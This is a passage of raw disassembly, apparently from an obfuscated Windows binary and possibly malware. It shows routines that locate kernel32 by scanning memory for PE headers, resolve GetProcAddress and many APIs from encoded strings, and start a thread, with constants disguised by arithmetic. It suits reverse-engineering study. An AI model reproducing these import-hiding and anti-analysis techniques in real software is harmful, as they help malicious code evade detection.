movzx eax, [ebp+arg_0]
mov edx, dword_44B1B4
add edx, dword_44B0B8
sub edx, 5
cmp eax, edx
jnz short loc_440273
mov eax, 65h
jmp loc_4402FA
; ---------------------------------------------------------------------------
loc_440273: ; CODE XREF: sub_44022F+38�j
movzx eax, [ebp+arg_0]
mov edx, dword_44B0B8
movsx ecx, word_44B0F4
add edx, ecx
sub edx, 0Ch
cmp eax, edx
jnz short loc_440294
mov eax, 79h
jmp short loc_4402FA
; ---------------------------------------------------------------------------
loc_440294: ; CODE XREF: sub_44022F+5C�j
movzx eax, [ebp+arg_0]
movsx edx, word_44B0E0
add edx, 2
cmp eax, edx
jnz short loc_4402AD
mov eax, 75h
jmp short loc_4402FA
; ---------------------------------------------------------------------------
loc_4402AD: ; CODE XREF: sub_44022F+75�j
movzx eax, [ebp+arg_0]
mov edx, dword_44B1B0
add edx, dword_44B1C4
sub edx, 2
cmp eax, edx
jnz short loc_4402CB
mov eax, 69h
jmp short loc_4402FA
; ---------------------------------------------------------------------------
loc_4402CB: ; CODE XREF: sub_44022F+93�j
movzx eax, [ebp+arg_0]
movsx edx, word_44B1BC
sub edx, 2
cmp eax, edx
jnz short loc_4402E4
mov eax, 6Fh
jmp short loc_4402FA
; ---------------------------------------------------------------------------
loc_4402E4: ; CODE XREF: sub_44022F+AC�j
movzx eax, [ebp+arg_0]
mov edx, dword_44B0FC
sub edx, 2
cmp eax, edx
jnz short loc_4402FA
mov eax, 61h
loc_4402FA: ; CODE XREF: sub_44022F+3F�j
; sub_44022F+63�j ...
pop edi
pop ebx
leave
retn
sub_44022F endp
; =============== S U B R O U T I N E =======================================
sub_4402FE proc near ; DATA XREF: .data:0044B2A8�o
mov eax, 80004001h
retn 18h
sub_4402FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440306 proc near ; DATA XREF: sub_442C0A+F8�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push edi
mov eax, [ebp+arg_4]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_447614 ; DefWindowProcA
pop edi
pop ebp
retn 10h
sub_440306 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440324 proc near ; DATA XREF: .data:0044B2F0�o
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
mov eax, [ebp+arg_10]
mov word ptr [ebp+arg_10], ax
mov eax, dword_44B0AC
add eax, 0C5h
cmp [ebp+arg_4], eax
jnz loc_44044B
mov [ebp+var_18], 3
lea eax, [ebp+var_10]
push eax
mov eax, dword_44B2D4
push eax
mov edi, [eax]
call dword ptr [edi+1Ch]
mov [ebp+var_4], eax
movsx eax, word_44B16C
add eax, dword_44B1A0
sub eax, 0Ah
cmp [ebp+var_4], eax
jnz loc_440447
dec [ebp+var_10]
lea eax, [ebp+var_1C]
push eax
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, dword_44B2D4
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov [ebp+var_4], eax
mov eax, dword_44B0B4
sub eax, 8
cmp [ebp+var_4], eax
jnz loc_440447
lea eax, [ebp+var_20]
push eax
push offset dword_44C97C
mov eax, [ebp+var_1C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov [ebp+var_4], eax
mov eax, dword_44B0AC
sub eax, 3
cmp [ebp+var_4], eax
jnz short loc_44043E
lea eax, off_44B2D0
mov [ebp+var_8], eax
push eax
mov ebx, [eax]
call dword ptr [ebx+4]
lea eax, [ebp+var_24]
push eax
push offset dword_44C8BC
mov eax, [ebp+var_8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov [ebp+var_4], eax
mov eax, dword_44B0A8
sub eax, 3
cmp [ebp+var_4], eax
jnz short loc_44042C
lea eax, [ebp+var_2C]
push eax
push offset dword_44C8BC
push [ebp+var_24]
push [ebp+var_20]
call sub_4434B2
add esp, 10h
mov [ebp+var_28], eax
mov eax, [ebp+var_24]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_44042C: ; CODE XREF: sub_440324+E3�j
mov eax, [ebp+var_8]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
mov eax, [ebp+var_20]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_44043E: ; CODE XREF: sub_440324+AE�j
mov eax, [ebp+var_1C]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_440447: ; CODE XREF: sub_440324+4E�j
; sub_440324+84�j
xor eax, eax
jmp short loc_440450
; ---------------------------------------------------------------------------
loc_44044B: ; CODE XREF: sub_440324+1D�j
mov eax, 80020003h
loc_440450: ; CODE XREF: sub_440324+125�j
pop edi
pop esi
pop ebx
leave
retn 24h
sub_440324 endp
; =============== S U B R O U T I N E =======================================
sub_440457 proc near ; CODE XREF: sub_440946+269�p
push edi
push offset dword_44C1E4
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A660, eax
push offset dword_44C1DC
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44600C, eax
push offset dword_44C1C8
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_4475E8, eax
push offset dword_44C1B8
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_448244, eax
push offset byte_44C1A9
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A788, eax
push offset word_44C19A
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445008, eax
push offset dword_44C188
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44AB9C, eax
push offset byte_44C17B
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44AB8C, eax
push offset dword_44C16C
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_449650, eax
push offset byte_44C15D
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A624, eax
push offset byte_44C151
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445000, eax
push offset word_44C146
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_4470E0, eax
push offset byte_44C12F
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44500C, eax
push offset dword_44C118
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A63C, eax
push offset word_44C102
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A608, eax
push offset word_44C0F2
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445034, eax
push offset word_44C0E6
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445028, eax
push offset word_44C0D6
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_448248, eax
push offset byte_44C0C7
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_449630, eax
push offset byte_44C0B9
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_447A34, eax
push offset dword_44C0AC
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_447618, eax
push offset byte_44C09B
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44825C, eax
push offset word_44C08A
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44502C, eax
push offset word_44C07A
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A770, eax
push offset dword_44C068
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_448258, eax
push offset byte_44C057
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_446004, eax
push offset word_44C04A
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_447608, eax
push offset byte_44C039
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A664, eax
push offset dword_44C024
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A64C, eax
push offset dword_44C014
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_446000, eax
push offset byte_44BFFF
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_4470D4, eax
push offset word_44BFF2
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_448364, eax
push offset word_44BFE2
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A61C, eax
push offset dword_44BFD4
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_449644, eax
push offset word_44BFBE
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_449638, eax
push offset byte_44BFA7
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_4475FC, eax
push offset byte_44BF8F
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_447A3C, eax
push offset byte_44BF77
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445010, eax
push offset word_44BF5E
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A614, eax
push offset byte_44BF4B
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A780, eax
push offset byte_44BF33
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A778, eax
push offset word_44BF22
call sub_4424C1
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44AB98, eax
push offset dword_44BF10
call sub_4424C1
add esp, 0ACh
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_4475F4, eax
pop edi
retn
sub_440457 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_440914 proc near ; DATA XREF: sub_43B52C+F2�o
push ebp
mov ebp, esp
loc_440917: ; CODE XREF: sub_440914+2C�j
push dword_44B1A4
call ds:dword_44A630
pop ecx
mov eax, dword_44B1CC
add eax, dword_44B1A0
sub eax, 0Ah
push eax
push offset sub_442318
push 0
call ds:dword_445048 ; EnumDesktopWindows
jmp short loc_440917
sub_440914 endp
; ---------------------------------------------------------------------------
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440946 proc near ; CODE XREF: start+1�p
var_138 = dword ptr -138h
var_132 = byte ptr -132h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = byte ptr -128h
var_127 = byte ptr -127h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_19 = byte ptr -19h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 138h
push ebx
push esi
push edi
lea eax, sub_442C0A
mov [ebp+var_10], eax
mov edx, eax
movsx ecx, word_44B128
add ecx, 10h
mov eax, edx
shr eax, cl
movsx edx, word_44B16C
add edx, 0Ch
mov ecx, edx
mov ebx, eax
shl ebx, cl
loc_44097B: ; CODE XREF: sub_440946+58�j
; sub_440946+89�j ...
mov [ebp+var_18], ebx
mov eax, ebx
cmp word ptr [eax], 5A4Dh
jz short loc_4409A0
movsx eax, word_44B0BC
movsx edx, word_44B194
lea eax, [eax+edx+0FFF7h]
sub ebx, eax
jmp short loc_44097B
; ---------------------------------------------------------------------------
loc_4409A0: ; CODE XREF: sub_440946+3F�j
movsx eax, word_44B100
lea eax, [eax+eax+2Ah]
mov esi, ebx
add esi, eax
mov eax, ebx
add eax, [esi]
mov [ebp+var_14], eax
mov ecx, [ebp+var_10]
cmp eax, ecx
jbe short loc_4409D1
mov eax, dword_44B1AC
add eax, 0FFFCh
add eax, dword_44B1B0
sub ebx, eax
jmp short loc_44097B
; ---------------------------------------------------------------------------
loc_4409D1: ; CODE XREF: sub_440946+75�j
mov eax, [ebp+var_14]
mov [ebp+var_8], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jz short loc_4409F1
movsx eax, word_44B19C
add eax, 0FFFAh
sub ebx, eax
jmp short loc_44097B
; ---------------------------------------------------------------------------
loc_4409F1: ; CODE XREF: sub_440946+99�j
mov eax, [ebp+var_8]
mov eax, [eax+80h]
mov [ebp+var_C], eax
mov eax, dword_44B18C
dec eax
mov [ebp+var_4], eax
jmp loc_440B94
; ---------------------------------------------------------------------------
loc_440A0B: ; CODE XREF: sub_440946+25A�j
mov eax, ebx
add eax, [ebp+var_C]
add eax, [ebp+var_4]
mov [ebp+var_12C], eax
mov edx, dword_44B1A4
cmp [eax], edx
jz loc_440BA6
mov eax, [ebp+var_12C]
mov edx, ebx
add edx, [eax+0Ch]
mov [ebp+var_130], edx
push edx
lea eax, [ebp+var_127]
push eax
call sub_444B60
mov eax, dword_44B0A0
add eax, dword_44B1AC
sub eax, 8
mov [ebp+var_28], eax
jmp short loc_440A7A
; ---------------------------------------------------------------------------
loc_440A58: ; CODE XREF: sub_440946+150�j
mov eax, [ebp+var_28]
mov al, [ebp+eax+var_127]
cmp al, 61h
jle short loc_440A77
cmp al, 7Ah
jge short loc_440A77
mov eax, [ebp+var_28]
lea eax, [ebp+eax+var_127]
sub byte ptr [eax], 20h
loc_440A77: ; CODE XREF: sub_440946+11E�j
; sub_440946+122�j
inc [ebp+var_28]
loc_440A7A: ; CODE XREF: sub_440946+110�j
mov eax, [ebp+var_28]
movsx eax, [ebp+eax+var_127]
mov edx, dword_44B094
add edx, dword_44B11C
sub edx, 9
cmp eax, edx
jnz short loc_440A58
mov eax, dword_44B1C0
mov edx, eax
add edx, dword_44B0B4
cmp [ebp+edx+var_132], 4Bh
jnz loc_440B90
mov edx, dword_44B158
movsx ecx, word_44B114
add edx, ecx
cmp [ebp+edx+var_128], 45h
jnz loc_440B90
mov edx, dword_44B124
add edx, dword_44B140
cmp byte ptr [ebp+edx+var_130+2], 52h
jnz loc_440B90
movsx edx, word_44B100
add eax, edx
cmp byte ptr [ebp+eax+var_130+2], 4Ch
jnz loc_440B90
mov eax, dword_44B138
mov edx, dword_44B10C
add edx, eax
cmp byte ptr [ebp+edx+var_130], 33h
jnz short loc_440B90
cmp [ebp+eax+var_128], 32h
jnz short loc_440B90
mov eax, [ebp+var_12C]
mov edx, ebx
add edx, [eax+10h]
mov [ebp+var_138], edx
mov eax, dword_44B0A4
movsx edx, word_44B1A8
add eax, edx
sub eax, 2
mov [ebp-134h], eax
loc_440B4A: ; CODE XREF: sub_440946+246�j
mov eax, [ebp+var_138]
mov esi, eax
add esi, [ebp-134h]
mov edi, [esi]
mov eax, dword_44B0F8
add eax, dword_44B14C
sub eax, 8
cmp edi, eax
jz short loc_440BA6
push edi
call sub_440C06
pop ecx
cmp dword_44B1D4, 0
jnz short loc_440BA6
movsx eax, word_44B090
add eax, 3
add [ebp-134h], eax
jmp short loc_440B4A
; ---------------------------------------------------------------------------
jmp short loc_440BA6
; ---------------------------------------------------------------------------
loc_440B90: ; CODE XREF: sub_440946+167�j
; sub_440946+184�j ...
add [ebp+var_4], 14h
loc_440B94: ; CODE XREF: sub_440946+C0�j
mov eax, [ebp+var_8]
mov eax, [eax+84h]
cmp [ebp+var_4], eax
jb loc_440A0B
loc_440BA6: ; CODE XREF: sub_440946+DB�j
; sub_440946+224�j ...
cmp dword_44B1D4, 0
jz short loc_440C01
call sub_440457
call sub_442662
call sub_4437B1
mov edx, eax
mov [ebp+var_19], dl
movzx eax, [ebp+var_19]
mov edx, dword_44B10C
add edx, dword_44B094
sub edx, 0Bh
cmp eax, edx
jz short loc_440C01
lea eax, [ebp+var_24]
push eax
mov eax, dword_44B1C4
sub eax, 5
push eax
lea eax, [ebp+var_20]
push eax
push offset sub_442C0A
mov eax, dword_44B1C8
sub eax, 2
push eax
push 0
call ds:dword_44AB90 ; CreateThread
loc_440C01: ; CODE XREF: sub_440946+267�j
; sub_440946+292�j
pop edi
pop esi
pop ebx
leave
retn
sub_440946 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440C06 proc near ; CODE XREF: sub_440946+227�p
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_281 = byte ptr -281h
var_26C = byte ptr -26Ch
var_252 = byte ptr -252h
var_23D = byte ptr -23Dh
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = byte ptr -220h
var_21F = byte ptr -21Fh
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_103 = byte ptr -103h
var_102 = byte ptr -102h
var_101 = byte ptr -101h
var_FE = byte ptr -0FEh
var_FD = byte ptr -0FDh
var_FC = byte ptr -0FCh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov ecx, dword_44B188
add ecx, 10h
shr edi, cl
movsx esi, word_44B170
add esi, 8
mov ecx, esi
mov ebx, edi
shl ebx, cl
loc_440C30: ; CODE XREF: sub_440C06+50�j
; sub_440C06+93�j ...
mov [ebp+var_114], ebx
mov eax, ebx
cmp word ptr [eax], 5A4Dh
jz short loc_440C58
movsx eax, word_44B114
movsx edx, word_44B16C
lea eax, [eax+edx+0FFFAh]
sub ebx, eax
jmp short loc_440C30
; ---------------------------------------------------------------------------
loc_440C58: ; CODE XREF: sub_440C06+37�j
mov eax, dword_44B098
add eax, 35h
add eax, dword_44B108
mov edx, ebx
add edx, eax
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_118], edx
mov eax, [ebp+arg_0]
cmp edx, eax
jbe short loc_440C9B
movsx eax, word_44B090
mov edx, dword_44B104
lea eax, [eax+edx+0FFFCh]
sub ebx, eax
jmp short loc_440C30
; ---------------------------------------------------------------------------
loc_440C9B: ; CODE XREF: sub_440C06+7B�j
mov eax, [ebp+var_118]
mov [ebp+var_11C], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jz short loc_440CC2
mov eax, dword_44B1B4
add eax, 0FFFFh
sub ebx, eax
jmp loc_440C30
; ---------------------------------------------------------------------------
loc_440CC2: ; CODE XREF: sub_440C06+A9�j
mov eax, [ebp+var_11C]
mov eax, [eax+78h]
mov [ebp+var_120], eax
mov ecx, ebx
add ecx, eax
mov [ebp+var_110], ecx
mov eax, ecx
mov edx, ebx
add edx, [eax+0Ch]
push edx
lea eax, [ebp+var_103]
push eax
call sub_444B60
movsx eax, word_44B154
sub eax, 8
mov [ebp+var_4], eax
jmp short loc_440D20
; ---------------------------------------------------------------------------
loc_440CFE: ; CODE XREF: sub_440C06+136�j
mov eax, [ebp+var_4]
mov al, [ebp+eax+var_103]
cmp al, 61h
jle short loc_440D1D
cmp al, 7Ah
jge short loc_440D1D
mov eax, [ebp+var_4]
lea eax, [ebp+eax+var_103]
sub byte ptr [eax], 20h
loc_440D1D: ; CODE XREF: sub_440C06+104�j
; sub_440C06+108�j
inc [ebp+var_4]
loc_440D20: ; CODE XREF: sub_440C06+F6�j
mov eax, [ebp+var_4]
movsx eax, [ebp+eax+var_103]
mov edx, dword_44B0E4
add edx, dword_44B18C
sub edx, 3
cmp eax, edx
jnz short loc_440CFE
cmp [ebp+var_103], 4Bh
jnz short loc_440D74
cmp [ebp+var_102], 45h
jnz short loc_440D74
cmp [ebp+var_101], 52h
jnz short loc_440D74
cmp [ebp+var_FE], 4Ch
jnz short loc_440D74
cmp [ebp+var_FD], 33h
jnz short loc_440D74
cmp [ebp+var_FC], 32h
jz short loc_440D79
loc_440D74: ; CODE XREF: sub_440C06+13F�j
; sub_440C06+148�j ...
jmp loc_440FB6
; ---------------------------------------------------------------------------
loc_440D79: ; CODE XREF: sub_440C06+16C�j
mov eax, dword_44B144
add eax, dword_44B1B8
sub eax, 8
mov [ebp+var_108], eax
jmp loc_440FA1
; ---------------------------------------------------------------------------
loc_440D92: ; CODE XREF: sub_440C06+3AA�j
mov eax, [ebp+var_108]
mov ecx, dword_44B1C8
add ecx, dword_44B094
sub ecx, 4
mul ecx
mov [ebp+var_228], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+20h]
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_224], edx
push edx
lea eax, [ebp+var_21F]
push eax
call sub_444B60
mov eax, dword_44B144
add eax, dword_44B0A8
cmp byte ptr [ebp+eax+var_228+1], 47h
jnz loc_440F9B
movsx eax, word_44B16C
add eax, dword_44B13C
cmp byte ptr [ebp+eax+var_224+1], 74h
jnz loc_440F9B
mov eax, dword_44B0A0
cmp [ebp+eax+var_220], 50h
jnz loc_440F9B
mov eax, dword_44B138
add eax, dword_44B158
cmp byte ptr [ebp+eax+var_224+3], 63h
jnz loc_440F9B
mov eax, dword_44B160
add eax, dword_44B12C
cmp byte ptr [ebp+eax+var_228+3], 41h
jnz loc_440F9B
mov eax, dword_44B120
add eax, 4
add eax, dword_44B0B8
cmp [ebp+eax+var_21F], 72h
jnz loc_440F9B
mov eax, [ebp+var_108]
movsx ecx, word_44B114
movsx esi, word_44B0D0
add ecx, esi
mul ecx
mov [ebp+var_288], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+24h]
mov [ebp+var_114], edx
movzx eax, word ptr [edx]
mov [ebp+var_22C], eax
mov ecx, dword_44B1CC
add ecx, dword_44B09C
sub ecx, 8
mul ecx
mov [ebp+var_28C], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+1Ch]
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_230], edx
mov dword_44B1D4, ebx
mov ds:dword_4471F8, edx
lea edi, [ebp+var_23D]
lea esi, aCreatethread ; "CreateThread"
mov ecx, 0Dh
rep movsb
lea edi, [ebp+var_252]
lea esi, aEntercriticals ; "EnterCriticalSection"
mov ecx, 15h
rep movsb
lea edi, [ebp+var_26C]
lea esi, aInitializecrit ; "InitializeCriticalSection"
mov ecx, 0Dh
rep movsw
lea edi, [ebp+var_281]
lea esi, aLeavecriticals ; "LeaveCriticalSection"
mov ecx, 15h
rep movsb
lea eax, [ebp+var_23D]
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44AB90, eax
lea eax, [ebp+var_252]
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A65C, eax
lea eax, [ebp+var_26C]
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_446008, eax
lea eax, [ebp+var_281]
push eax
push dword_44B1D4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44964C, eax
jmp short loc_440FB6
; ---------------------------------------------------------------------------
loc_440F9B: ; CODE XREF: sub_440C06+1E8�j
; sub_440C06+203�j ...
inc [ebp+var_108]
loc_440FA1: ; CODE XREF: sub_440C06+187�j
mov eax, [ebp+var_110]
mov eax, [eax+18h]
cmp [ebp+var_108], eax
jb loc_440D92
loc_440FB6: ; CODE XREF: sub_440C06:loc_440D74�j
; sub_440C06+393�j
pop edi
pop esi
pop ebx
leave
retn
sub_440C06 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440FBB proc near ; CODE XREF: sub_43AFB5+18C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push edi
lea eax, [ebp+var_4]
push eax
push 20019h
mov eax, dword_44B1C8
sub eax, 2
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4475EC ; RegOpenKeyExA
mov edi, eax
or edi, edi
jz short loc_440FE8
xor eax, eax
jmp short loc_441015
; ---------------------------------------------------------------------------
loc_440FE8: ; CODE XREF: sub_440FBB+27�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call ds:dword_44503C ; RegQueryValueExA
mov edi, eax
push [ebp+var_4]
call ds:dword_44A618 ; RegCloseKey
or edi, edi
jz short loc_441012
xor eax, eax
jmp short loc_441015
; ---------------------------------------------------------------------------
loc_441012: ; CODE XREF: sub_440FBB+51�j
xor eax, eax
inc eax
loc_441015: ; CODE XREF: sub_440FBB+2B�j
; sub_440FBB+55�j
pop edi
leave
retn
sub_440FBB endp
; =============== S U B R O U T I N E =======================================
sub_441018 proc near ; DATA XREF: .data:0044B2A0�o
mov eax, 80004001h
retn 8
sub_441018 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_441020 proc near ; CODE XREF: sub_43E1CC+A3�p
; sub_43E1CC+DA�p ...
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push edi
movzx eax, [ebp+arg_0]
mov ecx, 0Ah
mov edx, 0CCCCCCCDh
mul edx
shr edx, 3
mov [ebp+var_4], edx
mov edi, edx
add edi, 61h
mov ebx, edi
mov [ebp+arg_0], bl
mov al, [ebp+arg_0]
cmp al, 65h
jz short loc_441061
cmp al, 79h
jz short loc_441061
cmp al, 75h
jz short loc_441061
cmp al, 69h
jz short loc_441061
cmp al, 6Fh
jz short loc_441061
cmp al, 61h
jnz short loc_441065
loc_441061: ; CODE XREF: sub_441020+2B�j
; sub_441020+2F�j ...
add [ebp+arg_0], 1
loc_441065: ; CODE XREF: sub_441020+3F�j
cmp [ebp+arg_0], 6Ah
jnz short loc_44106F
add [ebp+arg_0], 1
loc_44106F: ; CODE XREF: sub_441020+49�j
movzx eax, [ebp+arg_0]
pop edi
pop ebx
leave
retn
sub_441020 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_441077 proc near ; CODE XREF: sub_43C281+20�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 4
push 1000h
push [ebp+arg_0]
push 0
call ds:dword_448248 ; VirtualAlloc
pop ebp
retn
sub_441077 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44108E proc near ; CODE XREF: sub_43F0EA+BA2�p
var_30C = dword ptr -30Ch
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_300 = dword ptr -300h
var_2FC = dword ptr -2FCh
var_2F8 = dword ptr -2F8h
var_2F4 = dword ptr -2F4h
var_2F0 = dword ptr -2F0h
var_2EC = dword ptr -2ECh
var_2E8 = dword ptr -2E8h
var_2E4 = dword ptr -2E4h
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C8 = dword ptr -2C8h
var_2C4 = dword ptr -2C4h
var_2BE = byte ptr -2BEh
var_2BC = dword ptr -2BCh
var_2B8 = dword ptr -2B8h
var_2B4 = dword ptr -2B4h
var_2B0 = dword ptr -2B0h
var_2AC = dword ptr -2ACh
var_2A8 = dword ptr -2A8h
var_2A4 = dword ptr -2A4h
var_2A0 = dword ptr -2A0h
var_29C = dword ptr -29Ch
var_298 = dword ptr -298h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_284 = dword ptr -284h
var_280 = dword ptr -280h
var_27C = dword ptr -27Ch
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = dword ptr -258h
var_253 = byte ptr -253h
var_23F = byte ptr -23Fh
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
